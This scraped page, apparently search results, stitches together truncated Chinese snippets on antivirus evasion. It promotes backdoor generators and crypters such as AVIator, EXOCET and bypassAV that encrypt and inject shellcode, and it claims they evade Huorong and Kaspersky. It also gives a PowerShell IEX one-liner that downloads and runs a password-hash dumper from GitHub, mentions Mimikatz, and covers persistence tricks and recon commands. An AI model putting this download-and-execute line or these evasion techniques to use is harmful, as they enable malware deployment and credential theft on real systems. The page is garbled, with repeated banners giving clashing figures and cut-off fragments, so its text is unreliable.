GitHub is where people build software. More than 150 million people use GitHub to discover, fork, and contribute to over 420 million projects.
GitHub is where people build software. More than 100 million people use GitHub to discover, fork, and contribute to over 420 million projects.
项目地址:https://github.com/Ch0pin/AVIator AV:全名为AntiVirus,意指为防病毒软件 AVIator是一个后门生成器实用程序,它使用加密和注入技术来绕过AV检测。进一步来说: 它使用AES加密来加密给定的shellcode 生成包含加密有效负载的可执行文件 使用各种注入技术将shellcode解密并注入目标系统 便携式可执行注入,包括将恶...
cna脚本下载地址 ①GitHub: github.com/cseroad/bypassAV.zip ②云中转网盘: bypassAV_www.ddosi.org.rar 杀毒软件绕过效果检测 ①bypass火绒效果 生成木马以及运行木马全程火绒无反应. 静态查杀未检测到病毒 运行上线火绒未报毒 读取文件火绒未报毒 ② bypass 卡巴斯基效果 静态查杀卡巴斯基未检测到病毒 成功上线-卡巴...
EXOCET,无论您使用哪个二进制文件来运行它,都需要 Golang 才能工作。默认情况下,它会生成一个 crypter .go 文件。 Windows 用户:安装 Go Here Linux 用户:运行sudoapt-getupdate && sudo apt-get install -y golang 您必须在 golang 中安装 EXOCET 源文件go get github.com/tanc7/EXOCET-AV-Evasion ...
Git 命令在线学习 如何在 Gitee 导入 GitHub 仓库 Git 仓库基础操作 企业版和社区版功能对比 SSH 公钥设置 如何处理代码冲突 仓库体积过大,如何减小? 如何找回被删除的仓库数据 Gitee 产品配额说明 GitHub仓库快速导入Gitee及同步更新 什么是 Release(发行版) 将PHP 项目自动发布到 packagist.org 评论...
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes 0x04 Dump the plain Password 同样也可以用下面的方式(执行powershell版的Mimikatz)获取明文。
powersploit还有其他非常有用的功能,有兴趣可以自己去github或者使用get-help查询。 3.手动编写 只要是工具用得太多都难免被AV发现,这个时候就需要手动编写自启动功能。 手动添加自启动,自删除,再改个图标后缀技能骗过杀软也能骗过人眼,扩展一下就是个大马,这里就不多说了。
https://github.com/3gstudent/Pentest-and-Development-Tips 天钧 2021/01/05 4.6K0 渗透测试常规操作记录(下) phpsshlinuxtcp/ip网络安全 Linux 操作系统&内核版本&环境变量 >cat /etc/issue >cat /etc/*-release >cat /etc/lsb-release >cat /etc/redhat-release cat /proc/version >uname -a >uname...
我以AdFind的基础功能作为参照,实现了一个轻量级的工具,完整的代码已上传github,地址如下: https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SharpADFindDemo.cs SharpADFindDemo可以在.Net3.5或.Net4的Windows系统下直接编译 编译方法如下: ...